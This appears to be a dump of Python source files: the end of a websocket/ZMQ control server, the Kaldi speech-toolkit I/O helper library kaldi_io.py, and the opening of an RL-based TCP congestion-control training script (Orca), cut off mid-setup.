await ws.send(req)
if random() < 0.05:
await ws.send('[FW] test loopback message')
else:
conn.send(req)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--motion', default="passthrough", help="Type of motion control to use")
parser.add_argument('--loopback', action='store_true', default=False, help="Transmit to self, for testing")
parser.add_argument('--dest', default="tcp://0.0.0.0:5559", help="Destination (ZMQ socket or serial dev path)")
parser.add_argument('--pull', default="tcp://0.0.0.0:5558", help="PULL socket destination (ignored when --dest is a serial device)")
parser.add_argument('--websocket_port', default=8001, type=int, help="Port for websocket control")
parser.add_argument('--http_port', default=8000, type=int, help="Port for HTTP server")
parser.add_argument('--web_dir', default="www", help="Web dir (relative to .py script)")
args = parser.parse_args(sys.argv[1:])
web_dir = os.path.join(os.path.dirname(__file__), args.web_dir)
print("Serving files from", web_dir)
os.chdir(web_dir)
# Webserver for html page
WEB_SERVER_ADDR = ("0.0.0.0", args.http_port)
srv = HTTPServer(WEB_SERVER_ADDR, WebServer)
threading.Thread(target=srv.serve_forever, daemon=True).start()
print("Started web server", str(WEB_SERVER_ADDR))
# Websocket for streaming comms from web client
WS_SERVER_ADDR = ("0.0.0.0", args.websocket_port)
wssrv = websockets.serve(handle_socket, WS_SERVER_ADDR[0], WS_SERVER_ADDR[1])
if not args.loopback:
conn = Broker(args.dest, args.pull, args.motion)
threading.Thread(target=conn.read_forever, daemon=True).start()
asyncio.get_event_loop().run_until_complete(wssrv)
print("Starting websocket server", str(WS_SERVER_ADDR))
asyncio.get_event_loop().run_forever()
|
kaldi_io.py | #!/usr/bin/env python
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
import numpy as np
import sys
import os
import re
import gzip
import struct
#################################################
# Adding kaldi tools to shell path,
# Select kaldi,
if 'KALDI_ROOT' not in os.environ:
# Default! To change run python with 'export KALDI_ROOT=/some_dir python'
os.environ['KALDI_ROOT'] = '/home/lijianchen/kaldi'
# Add kaldi tools to path,
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:'
'$KALDI_ROOT/tools/openfst/bin:'
'$KALDI_ROOT/src/fstbin/:'
'$KALDI_ROOT/src/gmmbin/:'
'$KALDI_ROOT/src/featbin/:'
'$KALDI_ROOT/src/lm/:'
'$KALDI_ROOT/src/sgmmbin/:'
'$KALDI_ROOT/src/sgmm2bin/:'
'$KALDI_ROOT/src/fgmmbin/:'
'$KALDI_ROOT/src/latbin/:'
'$KALDI_ROOT/src/nnetbin:'
'$KALDI_ROOT/src/nnet2bin:'
'$KALDI_ROOT/src/nnet3bin:'
'$KALDI_ROOT/src/online2bin/:'
'$KALDI_ROOT/src/ivectorbin/:'
'$KALDI_ROOT/src/lmbin/').readline().strip() + \
':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception):
pass
class UnknownVectorHeader(Exception):
pass
class UnknownMatrixHeader(Exception):
pass
class BadSampleSize(Exception):
pass
class BadInputFormat(Exception):
pass
class SubprocessFailed(Exception):
pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
Seeks to an offset if the 'file' argument contains a ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix, file) = file.split(':', 1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file, offset) = file.rsplit(':', 1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], 'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], 'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Seek to the offset, if one was given,
if offset != None:
fd.seek(int(offset))
return fd
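# Usage sketches for open_or_fd() (paths are hypothetical):
# open_or_fd('feats.ark') -> plain file
# open_or_fd('feats.ark.gz') -> gzip stream
# open_or_fd('gunzip -c feats.ark.gz |') -> reading pipe via popen()
# open_or_fd('ark:feats.ark:1024') -> strips 'ark:', opens, seeks to 1024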
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess
import io
import threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd, ret))
return
# text-mode,
if mode == "r":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup, args=(proc, cmd)
).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup, args=(proc, cmd)
).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup, args=(proc, cmd)
).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup, args=(proc, cmd)
).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode()
if char == '':
break
if char == ' ':
break
key += char
key = key.strip()
if key == '':
return None # end of file,
assert(re.match('^[\.\/a-zA-Z0-9_-]+$', key) != None) # check format,
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_vec_int(file_or_fd):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # vector dim
# Elements of the int32 vector are stored as tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(
vec_size*5), dtype=[('size', 'int8'), ('value', 'int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('[')
arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd:
fd.close() # cleanup
return ans
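# Binary layout read above (a sketch, assuming a little-endian machine):
# b'\0B' flag, b'\x04' + int32 dim, then per element b'\x04' + int32 value;
# e.g. the vector [7] is stored as b'\x00B\x04\x01\x00\x00\x00\x04\x07\x00\x00\x00'.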
# Writing,
def write_vec_int(file_or_fd, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_int(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3:
assert(fd.mode == 'wb')
try:
if key != '':
fd.write((key+' ').encode()) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd:
fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:vec for key,vec in kaldi_io.read_vec_flt_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key, rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile)
yield key, vec
finally:
if fd is not file_or_fd:
fd.close()
def read_vec_flt_ark(file_or_fd):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
vec = read_vec_flt(fd)
yield key, vec
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_vec_flt(file_or_fd):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
# Data type,
header = fd.read(3).decode()
if header == 'FV ':
sample_size = 4 # floats
elif header == 'DV ':
sample_size = 8 # doubles
else:
raise UnknownVectorHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimension,
assert(fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # vector dim
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4:
ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8:
ans = np.frombuffer(buf, dtype='float64')
else:
raise BadSampleSize
return ans
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('[')
arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd:
fd.close() # cleanup
return ans
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3:
assert(fd.mode == 'wb')
try:
if key != '':
fd.write((key+' ').encode()) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32':
fd.write('FV '.encode())
elif v.dtype == 'float64':
fd.write('DV '.encode())
else:
raise UnsupportedDataType(
"'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd:
fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key, rxfile) = line.decode().split(' ')
mat = read_mat(rxfile)
yield key, mat
finally:
if fd is not file_or_fd:
fd.close()
def read_mat_ark(file_or_fd):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
mat = read_mat(fd)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_mat(file_or_fd):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd)
try:
binary = fd.read(2).decode()
if binary == '\0B':
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd:
fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'):
return _read_compressed_mat(fd, header)
elif header == 'FM ':
sample_size = 4 # floats
elif header == 'DM ':
sample_size = 8 # doubles
else:
raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(
fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4:
vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8:
vec = np.frombuffer(buf, dtype='float64')
else:
raise BadSampleSize
mat = np.reshape(vec, (rows, cols))
return mat
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0):
raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0:
continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr, dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1], dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue', 'float32'), ('range', 'float32'), (
'num_rows', 'int32'), ('num_cols', 'int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0', 'uint16'), ('percentile_25',
'uint16'), ('percentile_75', 'uint16'), ('percentile_100', 'uint16')])
# Mapping for percentiles in col-headers,
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
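# Note: 1.52590218966964e-05 is 1/65535, so the uint16 percentile 'value'
# is mapped linearly onto [min, min + range]; value=65535 gives min + range.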
# Mapping for matrix elements,
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64)
mask_65_192 = np.all([vec > 64, vec <= 192], axis=0)
mask_193_255 = (vec > 192)
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / \
63. * (vec[mask_193_255] - 192)
return ans
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(
fd.read(16), dtype=global_header, count=1)[0]
# The data is structured as [ColHeader, ..., ColHeader, Data, Data, ...]:
# 'cols' column headers (8 bytes each) followed by cols*rows bytes of uint8 data.
col_headers = np.frombuffer(
fd.read(cols*8), dtype=per_col_header, count=cols)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8',
count=cols*rows), newshape=(cols, rows)) # stored as col-major,
mat = np.empty((cols, rows), dtype='float32')
for i, col_header in enumerate(col_headers):
col_header_flt = [uint16_to_float(
percentile, globmin, globrange) for percentile in col_header]
mat[i] = uint8_to_float_v2(data[i], *col_header_flt)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3:
assert(fd.mode == 'wb')
try:
if key != '':
fd.write((key+' ').encode()) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32':
fd.write('FM '.encode())
elif m.dtype == 'float64':
fd.write('DM '.encode())
else:
raise UnsupportedDataType(
"'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd:
fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd)
def read_post_ark(file_or_fd):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_post(file_or_fd):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd)
ans = []
binary = fd.read(2).decode()
assert(binary == '\0B') # binary flag
assert(fd.read(1).decode() == '\4') # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4') # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx', 'int8'), (
'idx', 'int32'), ('size_post', 'int8'), ('post', 'float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx', 'post']].tolist())
if fd is not file_or_fd:
fd.close()
return ans
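# Example of the returned structure (values hypothetical): a 2-frame
# posterior could be [[(4, 0.7), (9, 0.3)], [(4, 1.0)]], i.e. one list of
# (index, value) tuples per frame.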
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_cntime_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_cntime(file_or_fd):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
assert(binary == '\0B') # assuming it's binary
assert(fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg', 'int8'), (
't_beg', 'float32'), ('size_end', 'int8'), ('t_end', 'float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
# Return vector of tuples (t_beg,t_end),
ans = data[['t_beg', 't_end']].tolist()
if fd is not file_or_fd:
fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
Uses a kaldi 'segments' file for a single wav; format: '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end are in seconds,
- 100 frames/second is assumed,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
# segments with only 1 wav-file,
assert(len(np.unique([rec[1] for rec in segs])) == 1)
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False, True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
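# Worked example (hypothetical segments file for one recording):
# utt1 rec1 0.00 0.50
# utt2 rec1 1.00 1.20
# yields a 120-element bool vector with frames 0-49 and 100-119 True
# (at the assumed 100 frames/second).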
|
d5 copy.py | '''
MIT License
Copyright (c) Chen-Yu Yen - Soheil Abbasloo 2020
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import threading
import logging
import tensorflow as tf
import sys
from agent import Agent
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import argparse
import gym
import numpy as np
import time
import random
import datetime
import sysv_ipc
import signal
import pickle
from utils import logger, Params
from envwrapper import Env_Wrapper, TCP_Env_Wrapper, GYM_Env_Wrapper
def create_input_op_shape(obs, tensor):
input_shape = [x or -1 for x in tensor.shape.as_list()]
return np.reshape(obs, input_shape)
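# Illustrative example (values hypothetical): for a placeholder of shape
# [None, 4], input_shape becomes [-1, 4], so a flat observation of length 4*k
# is reshaped into a batch of k rows.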
def evaluate_TCP(env, agent, epoch, summary_writer, params, s0_rec_buffer, eval_step_counter):
score_list = []
eval_times = 1
eval_length = params.dict['max_eps_steps']
start_time = time.time()
for _ in range(eval_times):
step_counter = 0
ep_r = 0.0
if not params.dict['use_TCP']:
s0 = env.reset()
# NOTE: when use_TCP is set, s0 is never assigned here; the recurrent branch
# below must then be taken (s0_rec_buffer is passed in by the caller).
if params.dict['recurrent']:
a = agent.get_action(s0_rec_buffer, False)
else:
a = agent.get_action(s0, False)
a = env.map_action(a[0][0])
print("matthew:a:"+str(a))
env.write_action(a)
while True:
eval_step_counter += 1
step_counter += 1
s1, r, terminal, error_code,ccc = env.step(a, eval_=True)
if error_code:
s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
if params.dict['recurrent']:
a1 = agent.get_action(s1_rec_buffer, False)
else:
a1 = agent.get_action(s1, False)
a1 = env.map_action(a1[0][0])
env.write_action(a1)
print("matthew:a1:"+str(a1))
else:
print("Invalid state received...\n")
env.write_action(a)
continue
ep_r = ep_r+r
if (step_counter+1) % params.dict['tb_interval'] == 0:
summary = tf.summary.Summary()
summary.value.add(tag='Eval/Step/0-Actions', simple_value=env.map_action(a))
summary.value.add(tag='Eval/Step/2-Reward', simple_value=r)
summary_writer.add_summary(summary, eval_step_counter)
s0 = s1
a = a1
if params.dict['recurrent']:
s0_rec_buffer = s1_rec_buffer
if step_counter == eval_length or terminal:
score_list.append(ep_r)
break
summary = tf.summary.Summary()
summary.value.add(tag='Eval/Return', simple_value=np.mean(score_list))
summary_writer.add_summary(summary, epoch)
return eval_step_counter
class learner_killer():
def __init__(self, buffer):
self.replay_buf = buffer
print("learner register sigterm")
signal.signal(signal.SIGTERM, self.handler_term)
print("test length:", self.replay_buf.length_buf)
def handler_term(self, signum, frame):
if not config.eval:
with open(os.path.join(params.dict['train_dir'], "replay_memory.pkl"), "wb") as fp:
pickle.dump(self.replay_buf, fp)
print("test length:", self.replay_buf.length_buf)
print("--------------------------Learner: Saving rp memory--------------------------")
print("-----------------------Learner's killed---------------------")
sys.exit(0)
class Orca_state(object):
"""
docstring
"""
Ordinary = 0
EI_c_1 = 1 #
EI_r_1 = 2 #
EI_c_2 = 3 #receive ack of the class action and generate the reward
EI_r_2 = 4 #receive ack of the rl action and generate the reward
EI_sequence=0 #0:cl first 1:rl first
u_1=0
u_2=0
u_3=0
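# Hedged summary of the EI cycle, reconstructed from the transition code in
# main() below (not taken from any external specification):
#   Ordinary -> EI_c_1 or EI_r_1 : RL and Cubic actions diverge enough
#   EI_*_1   -> the other *_1, or *_2 : try each action once, recording u_1
#   EI_*_2   -> Ordinary : record u_2/u_3, keep the better action or prev_cwnd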
def main():
tf.get_logger().setLevel(logging.ERROR)
parser = argparse.ArgumentParser()
parser.add_argument('--load', action='store_true', default=False, help='default is %(default)s')
parser.add_argument('--eval', action='store_true', default=False, help='default is %(default)s')
parser.add_argument('--tb_interval', type=int, default=1)
parser.add_argument('--train_dir', type=str, default=None)
parser.add_argument('--mem_r', type=int, default = 123456)
parser.add_argument('--mem_w', type=int, default = 12345)
parser.add_argument('--base_path',type=str, required=True)
parser.add_argument('--job_name', type=str, choices=['learner', 'actor'], required=True, help="Job name: either 'learner' or 'actor'")
parser.add_argument('--task', type=int, required=True, help='Task id')
## parameters from parser
global config
global params
config = parser.parse_args()
print("matthew:job name:"+str(config.job_name))
## parameters from file
params = Params(os.path.join(config.base_path,'params.json'))
print("Params:"+str(params.dict))
# print()
#parameters of the Orca itself
orca_state=Orca_state.Ordinary
th3=0.2
if params.dict['single_actor_eval']:
print("matthew:single_actor_eval")
local_job_device = ''
shared_job_device = ''
def is_actor_fn(i): return True
global_variable_device = '/cpu'
is_learner = False
print("matthew:create_local_server")
server = tf.train.Server.create_local_server()  # creates a local single-process cluster whose server starts immediately
filters = []
else:
local_job_device = '/job:%s/task:%d' % (config.job_name, config.task)
shared_job_device = '/job:learner/task:0'
is_learner = config.job_name == 'learner'
print("matthew:is_learner1:"+str(is_learner))
global_variable_device = shared_job_device + '/cpu'
def is_actor_fn(i): return config.job_name == 'actor' and i == config.task
if params.dict['remote']:
cluster = tf.train.ClusterSpec({
'actor': params.dict['actor_ip'][:params.dict['num_actors']],
'learner': [params.dict['learner_ip']]
})
else:
cluster = tf.train.ClusterSpec({
'actor': ['localhost:%d' % (8001 + i) for i in range(params.dict['num_actors'])],
'learner': ['localhost:8000']
})
server = tf.train.Server(cluster, job_name=config.job_name,
task_index=config.task)
filters = [shared_job_device, local_job_device]
if params.dict['use_TCP']:
env_str = "TCP"
env_peek = TCP_Env_Wrapper(env_str, params,use_normalizer=params.dict['use_normalizer'])
else:
env_str = 'YourEnvironment'
env_peek = Env_Wrapper(env_str)
s_dim, a_dim = env_peek.get_dims_info()
action_scale, action_range = env_peek.get_action_info()
print("action_scale:"+str(action_scale))
print("action_range:"+str(action_range))
if not params.dict['use_TCP']:
params.dict['state_dim'] = s_dim
if params.dict['recurrent']:
s_dim = s_dim * params.dict['rec_dim']
if params.dict['use_hard_target']:
params.dict['tau'] = 1.0
with tf.Graph().as_default(),\
tf.device(local_job_device + '/cpu'):
tf.set_random_seed(1234)
random.seed(1234)
